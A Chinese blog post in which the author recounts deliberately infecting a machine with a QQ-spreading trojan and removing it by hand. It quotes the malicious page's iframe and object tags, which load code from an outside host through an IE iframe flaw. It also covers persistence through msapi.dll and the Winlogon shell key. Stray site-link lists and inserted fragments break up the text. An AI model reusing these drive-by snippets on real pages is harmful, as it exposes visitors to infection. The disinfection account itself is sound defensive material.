昨天辦公室裡剛幫別人裝好的一台機器被同事玩qq染上了病毒,他無意中點擊了別人給他發來信息裡的網址,說可以免費得qq幣,以前看到過此類qq病毒,但一直沒有機會接觸,於是就找殺毒軟件殺,下了金山的qq病毒專殺工具,查到內存裡有Win32.Troj.QQMydj2005dl.125440,自學教程,但是殺一下,屏幕馬上又重新啟動了一下shell(也就是explorer),再運行qq還是一樣,病毒依舊。 ·徹底解決services.exe進程病毒·掃出100多個病毒,3個隱身進程(第1版)·20年最強病毒排行榜·U盤“拒絕訪問”病毒的清除辦法·老話新說:iexplore.exe是進程還是病毒·“德夫下載器”修改系統時間動激活病毒·06上半年十大病毒排行榜出爐 灰鴿子成·必須掌握的病毒知識·詳解各種QQ病毒特征及清除方法·只需這幾招:拒絕重復感染病毒
呵呵,看來內存裡的進程沒清掉,文件掃描並沒發現有病毒.於是想先把ie打補丁,但補丁卻提示我的ie6不是ie6,補丁也打不上,於是我想就看看到底這個網站作了什麼手腳. "我不下地獄誰下地獄"想起了佛祖為了拯救世人而所做的,我做了一個愚蠢而魯莽的決定:(決定用我的機器染一次病毒,但我卻范了一個嚴重的錯誤,忘記了備份注冊表(以後要考慮周全再行事,各位千萬不要學我啊)後果可想而知,我的qq也一樣,5自學網,只要一點用戶聊天,病毒自己就會定時的粘貼一些垃圾和網址到發送對話框中,並自動發送。如此開始了我的手動清除之旅,我用一個httpdebug調試器,開始連接調試qq上發過來的那個網站,然後察看它網頁的源代碼又上網查找相關的漏洞,原來是ie的iframe漏洞,它可以嵌入別的網頁,但存在著緩沖區漏洞,如果惡意網頁構造特定的內容就可以讓未補丁的ie客戶機執行任意指令。發現問題在這裡 〈Iframe src="http://www.joyiex.com/dq.htm" scrolling="no" frameborder="0"〉〈/iframe〉 〈noscript〉〈iframe src=*〉〈/iframe〉〈/noscript〉 又開始連接dq.htm,結果又得到 <HTML> <object data="dq.asp"> </HTML> 看來是個asp,接著連接dq.asp結果得到的如下圖。 不是把,我主頁,搜索頁等等都被它替換了,最可氣連regedit都給我禁止了我作了個解鎖的reg文件,這個文件網上很多,總算能編輯注冊表了,看了看Run鍵值並未有什麼可疑程序,又下了個3721的ie修復,還原了一下ie的各設置,但qq病毒還是沒弄掉,於是我用vc自帶的進程查看器pview和spy 查看一下有什麼進程可疑,但都沒發現,突然想起金山qq專殺可以看到那個進程號,於是就發現那個進程id是explorer,這是shell進程,看來是病毒是通過explorer執行了其他程序,於是確定硬盤上一定有它的文件,這回又使用了一下金山qq專殺,把內存項去掉了。 只查找c:盤,結果是有一個病毒,但列表中並沒出現哪個文件,於是又多次查找,終於大概看到是ms打頭的文件,於是直接到目錄查看,看到有msapi.dll,msapi.exe兩個文件是染毒時間產生的,基本判斷是這兩個文件了。.exe 可以刪掉,但馬上又會新產生一個,.dll刪不掉,看來內存中的程序是以dll形態運行著,如果發現.exe不存在就生成一個新的,於是又到注冊表裡搜索msapi,終於發現在winlogin 的子鍵shell裡有,呵呵總算找到它了,下面把它刪除了,但是再一看又出來了,看來內存中的程序一直監控著這個鍵值,它是下次系統啟動病毒正確執行的關鍵。 既然內存中的先清除不了,但.exe文件可以刪除於是我把記事本程序改了成msapi.exe拷了過去,覆蓋了病毒的msapi.exe,重新啟動機器,哈,和預想的一樣,記事本出來了,內存中應該沒有病毒了,手動刪除掉msapi.dll和注冊表裡的鍵值,就這樣問題解決了。 最後總結一下所得到的經驗和教訓,看來開機啟動運行的程序不一定都在RUN鍵值裡,用explorer啟動的程序在進程中只是顯示explorer,分析這樣的程序時最好先用工具備份注冊表,最後覺得這個程序應該算是後門程序,在這裡,希望和大家分享一下這個經歷,本人文字功夫有限,有理解不對的地方還望大家指正。
